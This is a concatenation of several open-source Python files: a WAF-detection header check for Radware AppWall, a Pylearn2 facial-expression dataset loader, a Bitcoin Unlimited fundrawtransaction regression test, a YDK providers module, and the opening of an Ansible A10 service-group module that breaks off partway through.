# @url: https://github.com/m4ll0k/Spaghetti
# @author: Momo Outaadi (M4ll0k)
# @license: See the file 'doc/LICENSE'
import re
class Radware():
@staticmethod
def Run(headers):
_ = False
try:
for item in headers.items():
_ = re.search(r'X-SL-CompState',item[0],re.I) is not None
if _:
return "AppWall Web Application Firewall (Radware)"
break
except Exception,ERROR:
print ERROR
|
Yukinoshita47/Yuki-Chan-The-Auto-Pentest
|
Module/Spaghetti/modules/fingerprints/waf/radware.py
|
Python
|
mit
| 602
|
"""
A Pylearn2 Dataset class for accessing the data for the
facial expression recognition Kaggle contest for the ICML
2013 workshop on representation learning.
"""
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2013, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
import csv
import numpy as np
import os
from pylearn2.datasets.dense_design_matrix import DefaultViewConverter
from pylearn2.datasets.dense_design_matrix import DenseDesignMatrix
from pylearn2.utils.string_utils import preprocess
class EmotionsDataset(DenseDesignMatrix):
"""
A Pylearn2 Dataset class for accessing the data for the
facial expression recognition Kaggle contest for the ICML
2013 workshop on representation learning.
"""
def __init__(self, which_set,
base_path = '${PYLEARN2_DATA_PATH}/icml_2013_emotions',
start = None,
stop = None,
preprocessor = None,
fit_preprocessor = False,
axes = ('b', 0, 1, 'c'),
fit_test_preprocessor = False):
"""
which_set: A string specifying which portion of the dataset
to load. Valid values are 'train' or 'public_test'
base_path: The directory containing the .csv files from kaggle.com.
This directory should be writable; if the .csv files haven't
already been converted to npy, this class will convert them
to save memory the next time they are loaded.
fit_preprocessor: True if the preprocessor is allowed to fit the
data.
fit_test_preprocessor: If we construct a test set based on this
dataset, should it be allowed to fit the test set?
"""
self.test_args = locals()
self.test_args['which_set'] = 'public_test'
self.test_args['fit_preprocessor'] = fit_test_preprocessor
del self.test_args['start']
del self.test_args['stop']
del self.test_args['self']
files = {'train': 'train.csv', 'public_test' : 'test.csv'}
try:
filename = files[which_set]
except KeyError:
raise ValueError("Unrecognized dataset name: " + which_set)
path = base_path + '/' + filename
path = preprocess(path)
X, y = self._load_data(path, which_set == 'train')
if start is not None:
assert which_set != 'test'
assert isinstance(start, int)
assert isinstance(stop, int)
assert start >= 0
assert start < stop
assert stop <= X.shape[0]
X = X[start:stop, :]
if y is not None:
y = y[start:stop, :]
view_converter = DefaultViewConverter(shape=[48,48,1], axes=axes)
super(EmotionsDataset, self).__init__(X=X, y=y, y_labels=7, view_converter=view_converter)
if preprocessor:
preprocessor.apply(self, can_fit=fit_preprocessor)
def adjust_for_viewer(self, X):
return (X - 127.5) / 127.5
def get_test_set(self):
return EmotionsDataset(**self.test_args)
def _load_data(self, path, expect_labels):
assert path.endswith('.csv')
# If a previous call to this method has already converted
# the data to numpy format, load the numpy directly
X_path = path[:-4] + '.X.npy'
Y_path = path[:-4] + '.Y.npy'
if os.path.exists(X_path):
X = np.load(X_path)
if expect_labels:
y = np.load(Y_path)
else:
y = None
return X, y
# Convert the .csv file to numpy
csv_file = open(path, 'r')
reader = csv.reader(csv_file)
# Discard header
row = reader.next()
y_list = []
X_list = []
for row in reader:
if expect_labels:
y_str, X_row_str = row
y = int(y_str)
y_list.append(y)
else:
X_row_str ,= row
X_row_strs = X_row_str.split(' ')
X_row = map(lambda x: float(x), X_row_strs)
X_list.append(X_row)
X = np.asarray(X_list).astype('float32')
if expect_labels:
y = np.asarray(y_list)
else:
y = None
np.save(X_path, X)
if y is not None:
np.save(Y_path, y)
return X, y
|
cosmoharrigan/pylearn2
|
pylearn2/scripts/icml_2013_wrepl/emotions/emotions_dataset.py
|
Python
|
bsd-3-clause
| 4,476
|
#!/usr/bin/env python3
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Copyright (c) 2015-2017 The Bitcoin Unlimited developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import pdb
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
# Create one-input, one-output, no-fee transaction:
class RawTransactionsTest(BitcoinTestFramework):
def setup_chain(self, bitcoinConfDict=None, wallets=None):
print(("Initializing test directory "+self.options.tmpdir))
initialize_chain_clean(self.options.tmpdir, 4, bitcoinConfDict, wallets)
def setup_network(self, split=False):
self.nodes = start_nodes(4, self.options.tmpdir)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
connect_nodes_bi(self.nodes,0,3)
self.is_network_split=False
self.sync_all()
def run_test(self):
print("Mining blocks...")
min_relay_tx_fee = self.nodes[0].getnetworkinfo()['relayfee']
# This test is not meant to test fee estimation and we'd like
# to be sure all txs are sent at a consistent desired feerate
for node in self.nodes:
node.settxfee(min_relay_tx_fee)
# if the fee's positive delta is higher than this value tests will fail,
# neg. delta always fail the tests.
# The size of the signature of every input may be at most 2 bytes larger
# than a minimum sized signature.
# = 2 bytes * minRelayTxFeePerByte
feeTolerance = 2 * min_relay_tx_fee/1000
self.nodes[2].generate(1)
self.sync_all()
self.nodes[0].generate(121)
self.sync_all()
watchonly_address = self.nodes[0].getnewaddress()
watchonly_pubkey = self.nodes[0].validateaddress(watchonly_address)["pubkey"]
watchonly_amount = Decimal(200)
self.nodes[3].importpubkey(watchonly_pubkey, "", True)
watchonly_txid = self.nodes[0].sendtoaddress(watchonly_address, watchonly_amount)
self.nodes[0].sendtoaddress(self.nodes[3].getnewaddress(), watchonly_amount / 10)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.5)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 5.0)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
###############
# simple test #
###############
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert(len(dec_tx['vin']) > 0) #test if we have enought inputs
#############################
# test preserving nLockTime #
#############################
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs,1234)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert(dec_tx["locktime"] == 1234)
################################
# test using default nLockTime #
################################
blockcount = self.nodes[0].getblockcount()
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
# there's a random chance of an earlier locktime so iterate a few times
for i in range(0,20):
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
if dec_tx["locktime"] == blockcount:
break
assert(dec_tx["locktime"] > 0)
assert(i<18) # incrediably unlikely to never produce the current blockcount
##############################
# simple test with two coins #
##############################
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 2.2 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert(len(dec_tx['vin']) > 0) #test if we have enough inputs
##############################
# simple test with two coins #
##############################
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 2.6 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert(len(dec_tx['vin']) > 0)
assert_equal(dec_tx['vin'][0]['scriptSig']['hex'], '')
################################
# simple test with two outputs #
################################
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 2.6, self.nodes[1].getnewaddress() : 2.5 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
for out in dec_tx['vout']:
totalOut += out['value']
assert(len(dec_tx['vin']) > 0)
assert_equal(dec_tx['vin'][0]['scriptSig']['hex'], '')
#########################################################################
# test a fundrawtransaction with a VIN greater than the required amount #
#########################################################################
utx = False
listunspent = self.nodes[2].listunspent()
for aUtx in listunspent:
if aUtx['amount'] == 5.0:
utx = aUtx
break
assert(utx!=False)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}]
outputs = { self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
for out in dec_tx['vout']:
totalOut += out['value']
assert_equal(fee + totalOut, utx['amount']) #compare vin total and totalout+fee
#####################################################################
# test a fundrawtransaction with which will not get a change output #
#####################################################################
utx = False
listunspent = self.nodes[2].listunspent()
for aUtx in listunspent:
if aUtx['amount'] == 5.0:
utx = aUtx
break
assert(utx!=False)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}]
outputs = { self.nodes[0].getnewaddress() : Decimal(5.0) - fee } # - feeTolerance } # BU having the fee tolerance in there creates a very small change output
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
txfee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
for out in dec_tx['vout']:
totalOut += out['value']
assert_equal(rawtxfund['changepos'], -1)
assert_equal(txfee + totalOut, utx['amount']) #compare vin total and totalout+fee
#########################################################################
# test a fundrawtransaction with a VIN smaller than the required amount #
#########################################################################
utx = False
listunspent = self.nodes[2].listunspent()
for aUtx in listunspent:
if aUtx['amount'] == 1.0:
utx = aUtx
break
assert(utx!=False)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}]
outputs = { self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
# 4-byte version + 1-byte vin count + 36-byte prevout then script_len
rawtx = rawtx[:82] + "0100" + rawtx[84:]
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
assert_equal("00", dec_tx['vin'][0]['scriptSig']['hex'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
matchingOuts = 0
for i, out in enumerate(dec_tx['vout']):
totalOut += out['value']
if out['scriptPubKey']['addresses'][0] in outputs:
matchingOuts+=1
else:
assert_equal(i, rawtxfund['changepos'])
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
assert_equal("00", dec_tx['vin'][0]['scriptSig']['hex'])
assert_equal(matchingOuts, 1)
assert_equal(len(dec_tx['vout']), 2)
###########################################
# test a fundrawtransaction with two VINs #
###########################################
utx = False
utx2 = False
listunspent = self.nodes[2].listunspent()
for aUtx in listunspent:
if aUtx['amount'] == 1.0:
utx = aUtx
if aUtx['amount'] == 5.0:
utx2 = aUtx
assert(utx!=False)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']},{'txid' : utx2['txid'], 'vout' : utx2['vout']} ]
outputs = { self.nodes[0].getnewaddress() : 6.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
matchingOuts = 0
for out in dec_tx['vout']:
totalOut += out['value']
if out['scriptPubKey']['addresses'][0] in outputs:
matchingOuts+=1
assert_equal(matchingOuts, 1)
assert_equal(len(dec_tx['vout']), 2)
matchingIns = 0
for vinOut in dec_tx['vin']:
for vinIn in inputs:
if vinIn['txid'] == vinOut['txid']:
matchingIns+=1
assert_equal(matchingIns, 2) #we now must see two vins identical to vins given as params
#########################################################
# test a fundrawtransaction with two VINs and two vOUTs #
#########################################################
utx = False
utx2 = False
listunspent = self.nodes[2].listunspent()
for aUtx in listunspent:
if aUtx['amount'] == 1.0:
utx = aUtx
if aUtx['amount'] == 5.0:
utx2 = aUtx
assert(utx!=False)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']},{'txid' : utx2['txid'], 'vout' : utx2['vout']} ]
outputs = { self.nodes[0].getnewaddress() : 6.0, self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
matchingOuts = 0
for out in dec_tx['vout']:
totalOut += out['value']
if out['scriptPubKey']['addresses'][0] in outputs:
matchingOuts+=1
assert_equal(matchingOuts, 2)
assert_equal(len(dec_tx['vout']), 3)
##############################################
# test a fundrawtransaction with invalid vin #
##############################################
listunspent = self.nodes[2].listunspent()
inputs = [ {'txid' : "1c7f966dab21119bac53213a2bc7532bff1fa844c124fd750a7d0b1332440bd1", 'vout' : 0} ] #invalid vin!
outputs = { self.nodes[0].getnewaddress() : 1.0}
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
try:
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
raise AssertionError("Spent more than available")
except JSONRPCException as e:
assert("Insufficient" in e.error['message'])
############################################################
#compare fee of a standard pubkeyhash transaction
inputs = []
outputs = {self.nodes[1].getnewaddress():1.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 1.1)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
#compare fee of a standard pubkeyhash transaction with multiple outputs
inputs = []
outputs = {self.nodes[1].getnewaddress():1.1,self.nodes[1].getnewaddress():1.2,self.nodes[1].getnewaddress():0.1,self.nodes[1].getnewaddress():1.3,self.nodes[1].getnewaddress():0.2,self.nodes[1].getnewaddress():0.3}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendmany("", outputs)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
#compare fee of a 2of2 multisig p2sh transaction
# create 2of2 addr
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[1].getnewaddress()
addr1Obj = self.nodes[1].validateaddress(addr1)
addr2Obj = self.nodes[1].validateaddress(addr2)
mSigObj = self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])
inputs = []
outputs = {mSigObj:1.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendtoaddress(mSigObj, 1.1)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
#compare fee of a standard pubkeyhash transaction
# create 4of5 addr
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[1].getnewaddress()
addr3 = self.nodes[1].getnewaddress()
addr4 = self.nodes[1].getnewaddress()
addr5 = self.nodes[1].getnewaddress()
addr1Obj = self.nodes[1].validateaddress(addr1)
addr2Obj = self.nodes[1].validateaddress(addr2)
addr3Obj = self.nodes[1].validateaddress(addr3)
addr4Obj = self.nodes[1].validateaddress(addr4)
addr5Obj = self.nodes[1].validateaddress(addr5)
mSigObj = self.nodes[1].addmultisigaddress(4, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey'], addr4Obj['pubkey'], addr5Obj['pubkey']])
inputs = []
outputs = {mSigObj:1.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendtoaddress(mSigObj, 1.1)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
# spend a 2of2 multisig transaction over fundraw
# create 2of2 addr
addr1 = self.nodes[2].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[2].validateaddress(addr1)
addr2Obj = self.nodes[2].validateaddress(addr2)
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])
# send 1.2 BTC to msig addr
txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)
self.sync_all()
self.nodes[1].generate(1)
self.sync_all()
oldBalance = self.nodes[1].getbalance()
inputs = []
outputs = {self.nodes[1].getnewaddress():1.1}
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[2].fundrawtransaction(rawTx)
signedTx = self.nodes[2].signrawtransaction(fundedTx['hex'])
txId = self.nodes[2].sendrawtransaction(signedTx['hex'])
self.sync_all()
self.nodes[1].generate(1)
self.sync_all()
# make sure funds are received at node1
assert_equal(oldBalance+Decimal('1.10000000'), self.nodes[1].getbalance())
############################################################
# locked wallet test
self.nodes[1].encryptwallet("test")
self.nodes.pop(1)
stop_nodes(self.nodes)
wait_bitcoinds()
self.nodes = start_nodes(4, self.options.tmpdir)
# This test is not meant to test fee estimation and we'd like
# to be sure all txs are sent at a consistent desired feerate
for node in self.nodes:
node.settxfee(min_relay_tx_fee)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
connect_nodes_bi(self.nodes,0,3)
self.is_network_split=False
self.sync_all()
# drain the keypool
self.nodes[1].getnewaddress()
inputs = []
outputs = {self.nodes[0].getnewaddress():1.1}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
# fund a transaction that requires a new key for the change output
# creating the key must be impossible because the wallet is locked
try:
fundedTx = self.nodes[1].fundrawtransaction(rawTx)
raise AssertionError("Wallet unlocked without passphrase")
except JSONRPCException as e:
assert('Keypool ran out' in e.error['message'])
#refill the keypool
self.nodes[1].walletpassphrase("test", 100)
self.nodes[1].walletlock()
try:
self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1.2)
raise AssertionError("Wallet unlocked without passphrase")
except JSONRPCException as e:
assert('walletpassphrase' in e.error['message'])
oldBalance = self.nodes[0].getbalance()
inputs = []
outputs = {self.nodes[0].getnewaddress():1.1}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[1].fundrawtransaction(rawTx)
#now we need to unlock
self.nodes[1].walletpassphrase("test", 100)
signedTx = self.nodes[1].signrawtransaction(fundedTx['hex'])
txId = self.nodes[1].sendrawtransaction(signedTx['hex'])
self.sync_all()
self.nodes[1].generate(1)
self.sync_all()
# make sure funds are received at node1
assert_equal(oldBalance+Decimal('51.10000000'), self.nodes[0].getbalance())
###############################################
# multiple (~19) inputs tx test | Compare fee #
###############################################
#empty node1, send some small coins from node0 to node1
self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), self.nodes[1].getbalance(), "", "", True)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
for i in range(0,20):
self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.01)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
#fund a tx with ~20 small inputs
inputs = []
outputs = {self.nodes[0].getnewaddress():0.15,self.nodes[0].getnewaddress():0.04}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[1].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[1].sendmany("", outputs)
signedFee = self.nodes[1].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance*19) #~19 inputs
#############################################
# multiple (~19) inputs tx test | sign/send #
#############################################
#again, empty node1, send some small coins from node0 to node1
self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), self.nodes[1].getbalance(), "", "", True)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
for i in range(0,20):
self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.01)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
#fund a tx with ~20 small inputs
oldBalance = self.nodes[0].getbalance()
inputs = []
outputs = {self.nodes[0].getnewaddress():0.15,self.nodes[0].getnewaddress():0.04}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[1].fundrawtransaction(rawTx)
fundedAndSignedTx = self.nodes[1].signrawtransaction(fundedTx['hex'])
txId = self.nodes[1].sendrawtransaction(fundedAndSignedTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(oldBalance+Decimal('50.19000000'), self.nodes[0].getbalance()) #0.19+block reward
#####################################################
# test fundrawtransaction with OP_RETURN and no vin #
#####################################################
rawtx = "0100000000010000000000000000066a047465737400000000"
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(len(dec_tx['vin']), 0)
assert_equal(len(dec_tx['vout']), 1)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert_greater_than(len(dec_tx['vin']), 0) # at least one vin
assert_equal(len(dec_tx['vout']), 2) # one change output added
##################################################
# test a fundrawtransaction using only watchonly #
##################################################
inputs = []
outputs = {self.nodes[2].getnewaddress() : watchonly_amount / 2}
rawtx = self.nodes[3].createrawtransaction(inputs, outputs)
result = self.nodes[3].fundrawtransaction(rawtx, True)
res_dec = self.nodes[0].decoderawtransaction(result["hex"])
assert_equal(len(res_dec["vin"]), 1)
assert_equal(res_dec["vin"][0]["txid"], watchonly_txid)
assert("fee" in result.keys())
assert_greater_than(result["changepos"], -1)
###############################################################
# test fundrawtransaction using the entirety of watched funds #
###############################################################
inputs = []
outputs = {self.nodes[2].getnewaddress() : watchonly_amount}
rawtx = self.nodes[3].createrawtransaction(inputs, outputs)
result = self.nodes[3].fundrawtransaction(rawtx, True)
res_dec = self.nodes[0].decoderawtransaction(result["hex"])
assert_equal(len(res_dec["vin"]), 2)
assert(res_dec["vin"][0]["txid"] == watchonly_txid or res_dec["vin"][1]["txid"] == watchonly_txid)
assert_greater_than(result["fee"], 0)
assert_greater_than(result["changepos"], -1)
assert_equal(result["fee"] + res_dec["vout"][result["changepos"]]["value"], watchonly_amount / 10)
signedtx = self.nodes[3].signrawtransaction(result["hex"])
assert(not signedtx["complete"])
signedtx = self.nodes[0].signrawtransaction(signedtx["hex"])
assert(signedtx["complete"])
self.nodes[0].sendrawtransaction(signedtx["hex"])
self.nodes[0].generate(1)
self.sync_all()
################################
# Test no address reuse occurs #
################################
inputs = []
outputs = {self.nodes[2].getnewaddress() : 1}
rawtx = self.nodes[3].createrawtransaction(inputs, outputs)
result3 = self.nodes[3].fundrawtransaction(rawtx)
res_dec = self.nodes[0].decoderawtransaction(result3["hex"])
changeaddress = ""
for out in res_dec['vout']:
if out['value'] > 1.0:
changeaddress += out['scriptPubKey']['addresses'][0]
assert(changeaddress != "")
nextaddr = self.nodes[3].getnewaddress()
# Now the change address key should be removed from the keypool
assert(changeaddress != nextaddr)
if __name__ == '__main__':
RawTransactionsTest().main(None,{"keypool":1})
|
Bitcoin-com/BUcash
|
qa/rpc-tests/fundrawtransaction.py
|
Python
|
mit
| 27,687
|
# ----------------------------------------------------------------
# Copyright 2016 Cisco Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------
""" providers.py
Service Providers module. Current implementation supports the NetconfServiceProvider which
uses ncclient (a Netconf client library) to provide CRUD services.
"""
import logging
from .provider import ServiceProvider
from .netconf_provider import NetconfServiceProvider
from .native_netconf_provider import NativeNetconfServiceProvider
from .codec_provider import CodecServiceProvider
logging.getLogger('ydk').addHandler(logging.NullHandler())
|
111pontes/ydk-py
|
core/ydk/providers/__init__.py
|
Python
|
apache-2.0
| 1,187
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Ansible module to manage A10 Networks slb service-group objects
(c) 2014, Mischa Peters <mpeters@a10networks.com>
This file is part of Ansible
Ansible is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Ansible is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Ansible. If not, see <http://www.gnu.org/licenses/>.
"""
DOCUMENTATION = '''
---
module: a10_service_group
version_added: 1.8
short_description: Manage A10 Networks devices' service groups
description:
- Manage slb service-group objects on A10 Networks devices via aXAPI
author: "Mischa Peters (@mischapeters)"
notes:
- Requires A10 Networks aXAPI 2.1
- When a server doesn't exist and is added to the service-group the server will be created
options:
host:
description:
- hostname or ip of your A10 Networks device
required: true
default: null
aliases: []
choices: []
username:
description:
- admin account of your A10 Networks device
required: true
default: null
aliases: ['user', 'admin']
choices: []
password:
description:
- admin password of your A10 Networks device
required: true
default: null
aliases: ['pass', 'pwd']
choices: []
service_group:
description:
- slb service-group name
required: true
default: null
aliases: ['service', 'pool', 'group']
choices: []
service_group_protocol:
description:
- slb service-group protocol
required: false
default: tcp
aliases: ['proto', 'protocol']
choices: ['tcp', 'udp']
service_group_method:
description:
- slb service-group loadbalancing method
required: false
default: round-robin
aliases: ['method']
choices: ['round-robin', 'weighted-rr', 'least-connection', 'weighted-least-connection', 'service-least-connection', 'service-weighted-least-connection', 'fastest-response', 'least-request', 'round-robin-strict', 'src-ip-only-hash', 'src-ip-hash']
servers:
description:
- A list of servers to add to the service group. Each list item should be a
dictionary which specifies the C(server:) and C(port:), but can also optionally
specify the C(status:). See the examples below for details.
required: false
default: null
aliases: []
choices: []
write_config:
description:
- If C(yes), any changes will cause a write of the running configuration
to non-volatile memory. This will save I(all) configuration changes,
including those that may have been made manually or through other modules,
so care should be taken when specifying C(yes).
required: false
default: "no"
choices: ["yes", "no"]
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be used
on personally controlled devices using self-signed certificates.
required: false
default: 'yes'
choices: ['yes', 'no']
'''
EXAMPLES = '''
# Create a new service-group
- a10_service_group:
host: a10.mydomain.com
username: myadmin
password: mypassword
service_group: sg-80-tcp
servers:
- server: foo1.mydomain.com
port: 8080
- server: foo2.mydomain.com
port: 8080
- server: foo3.mydomain.com
port: 8080
- server: foo4.mydomain.com
port: 8080
status: disabled
'''
VALID_SERVICE_GROUP_FIELDS = ['name', 'protocol', 'lb_method']
VALID_SERVER_FIELDS = ['server', 'port', 'status']
def validate_servers(module, servers):
for item in servers:
for key in item:
if key not in VALID_SERVER_FIELDS:
module.fail_json(msg="invalid server field (%s), must be one of: %s" % (key, ','.join(VALID_SERVER_FIELDS)))
# validate the server name is present
if 'server' not in item:
module.fail_json(msg="server definitions must define the server field")
# validate the port number is present and an integer
if 'port' in item:
try:
item['port'] = int(item['port'])
except:
module.fail_json(msg="server port definitions must be integers")
else:
module.fail_json(msg="server definitions must define the port field")
# convert the status to the internal API integer value
if 'status' in item:
item['status'] = axapi_enabled_disabled(item['status'])
else:
item['status'] = 1
def main():
argument_spec = a10_argument_spec()
argument_spec.update(url_argument_spec())
argument_spec.update(
dict(
state=dict(type='str', default='present', choices=['present', 'absent']),
service_group=dict(type='str', aliases=['service', 'pool', 'group'], required=True),
service_group_protocol=dict(type='str', default='tcp', aliases=['proto', 'protocol'], choices=['tcp', 'udp']),
